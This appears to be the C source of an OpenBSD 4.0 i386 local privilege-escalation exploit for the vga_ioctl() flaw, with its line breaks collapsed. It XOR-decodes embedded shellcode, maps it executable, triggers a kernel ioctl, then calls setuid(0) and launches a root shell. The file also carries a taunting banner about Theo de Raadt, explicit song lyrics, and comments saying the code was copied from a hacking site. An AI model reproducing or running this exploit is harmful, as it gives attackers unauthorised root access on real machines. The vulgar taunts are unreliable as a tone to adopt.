#include <string.h>#include <stdlib.h>#include <stdio.h>#include <unistd.h>#include <sys/param.h>#include <err.h>#include <sys/ioctl.h>#include <sys/syscall.h>#include <fcntl.h>#include <sys/types.h>#include <sys/stat.h>#include <sys/mman.h>#include <sys/sysctl.h>char shlr[]="\xc9\xd1\xd1\xd1\xc9\xd1\xd1\xd1\xc9\xd1\xd1\xd1\xc9\xd1\xd1\xd1\xc9""\xd1\xd1\xd1\xc9\xd1\xd1\xd1\x39\xde\xd1\xd1\xd1\xa9\x87\xe5\xc3\x2f\x1b\x7c""\x0f\x7c\x0f\x3e\x6f\x41\x41\x41\x8e\x5a\xde\x5a\x88\xc1\xe0\x11\x58\x92\xd5""\x5a\xc2\x58\x93\xd5\x69\x80\x96\x99\x01\x2e\x31\xd1";double obsdv;unsigned long mg1=0x21524110;unsigned long mg2=0xcc99e897;unsigned long mg3=0xffffffff;unsigned long mg4=0x12345678; // ??char shl[]=" 85 c8 c3 c4 85 d9 c2 aa";void get_proc(pid_t dp,struct kinfo_proc *kp);//Tmp file copy_paste exploit ;(char tks[]="\x6e\x35\x2c\x31\x6e\x35\x29\x24\x2e\x6f\x19\x19\x19\x19\x19\x41";char gde[]="\x00\x4b\x4a\x59\x00\x5b\x5b\x56\x6c\x1f\x2f";//Copy paste and more shit de http://www.hackturkiye.com/page.php?id=188&baslik=openbsd-3x-40-vga-ioctl-local-root-exploit&ratings=1static void evi(){ unsigned long rts[2]={0xee5f9be,0xebdfc46}; int i,moo,moooo; void *p; unsigned long ppa; struct kinfo_proc kp; rts[0]=rts[0]^(mg1^mg3); rts[1]=rts[1]^(mg2^mg4); gpr((pid_t)getpid(),&kp); ppa=(unsigned long)kp.kp_eproc.e_paddr; shlr[24+5]=ppa&0xff; shlr[24+6]=(ppa>>8)&0xff;shlr[24+7]=(ppa>>16)&0xff; shlr[24+8]=(ppa>>24)&0xff; printf("[ + ] S h e l l c o d e : ""%u bytes at %p.",(unsigned)sizeof(shlr),&shlr); moo=mkstemp(tks); if(moo<0){ err(1,"Open"); } write(moo,shlr,sizeof(shlr)); if((lseek(moo,0L,SEEK_SET))<0){ err(1,"lseek "); } p=mmap(0,sizeof(shlr),PROT_READ|PROT_EXEC,MAP_FIXED,moo,0); if(p==MAP_FAILED){ err(1,"mmap "); } moooo=open(gde,O_RDWR); if(moooo<0){ munmap(p,sizeof(shlr)); close(moo); err(1,"open"); } syscall(SYS_ioctl,moooo,0x80044103,NULL); close(moooo); close(moo); seteuid(0); setuid(0); execl(shl,"sh",0); } double vobsd(){ int rg[2],l; char *p; double re; rg[0]=CTL_KERN; rg[1]=KERN_OSRELEASE; if(sysctl(rg,2,NULL,(size_t *)&l,NULL,0)==-1){ err(1,"s y s c t l "); } if((p=malloc(l))==NULL){ err(1,NULL); } if(sysctl(rg,2,p,(size_t *)&l,NULL,0)==-1){ err(1,"sysctl"); } re=atof(p); printf("[ + ] OpenBSD release detected: %s (%f)\n",p,re); free(p); return re;}void use_exploit(){ printf( " O p e n B S D : Only secure in single user environments for more than 10 years ! " " Target vulnerability: " " vga :vga_ioctl() local exploit (4.0 and 3.9 generici 386 ) " " i p 6 4 0 : ICMPv6 remoteexploit(4.0 generic i386) (root required! )" " Dare you to run his exploit as root . OpenBS " ); exit(-1);}void get_proc(pid_t dp, struct kinfo_proc *kp){ int rg[4],l; rg[0]=CTL_KERN; rg[1]=KERN_PROC; rg[2]=KERN_PROC_PID; rg[3]=dp; l=sizeof(struct kinfo_proc); if(sysctl(rg,4,kp,(size_t *)&l,NULL,0)<0){ err(1," sysctl "); err (1,"Could not retrieve " "proc structure!"); }}//Shit functionstatic void xo(char u[],unsigned int l,int k){ unsigned int i; for(i=0;i<l;i++){ u[i]=u[i]^k; }}static int was=0;//Shit function 2 partvoid text_movie(int w,char *rr[],int nz,int wsn){ int i,b; char *u=0; while(was<wsn){ for(i= 0;i<nz;i++){ u=rr[i]; for(b=0;b<w;b++){ printf("\b"); } printf("%s",u); fflush(stdout); sleep(1); } was++; } printf("\n");}int main(int a,char **g){ char *theosmovie[]={ " Sucking on my titties like you wanted me Calling me , all the " "time like Blondie Check out my chrissy behind It's fine all of " "the time Like sex on the beaches What else is in the teaches of peaches? " "Huh? What? Huh? Right. What? Uhh Huh? Right. What? Uhh? SIS IUD, stay in " "school 'cause it's the best IUD SIS , stay in school ' cause it's the " "best SIS ID, stay in school ' cause it's the best" "Fuck the pain away? Fuck the pain away! " " ","Fuck the pain away! Fuck the pain away? " " ","Fuck the 0day away. Fuck the pain away!" " ","Fuck the pain away! Fuck the" " pain away? ","Fuck the 0day aw" "ay? Fuck the pain away! "}; printf(" _ _ _ O p e n B S D M o v i e b y T h e o d e R a a d t "" / / 7 S t a r r i n g . . . "" ( _ , _ / \ . . . h i m s e l f ! "" \ \ "" \ \ B r o u g h t t o y o u b y . . . "" _ \ \ _ _ " ( \ ) T h e o ' s l o s t D A R P A f u n d i n g " " \ _ _ _ \ _ _ _ / & P e a c h e s . " ); if(a<2){ use_exploit(); } //Get os version obsdv=vobsd(); //Do movie text text_movie(80,theosmovie,sizeof(theosmovie)/sizeof(char *),1); //Shit code xo(shl,sizeof(shl),shl[sizeof(shl)]); xo(shlr,sizeof(shlr),0xd1); xo(tks,sizeof(tks),0x41); xo(gde,sizeof(gde), 0x2f); //End shit code //Only one exploit in one oooooooo :( if(obsdv==4.0&&!strcmp(g[1],"vga")){ //Copy paste exploit from..... evi(); } return 0;}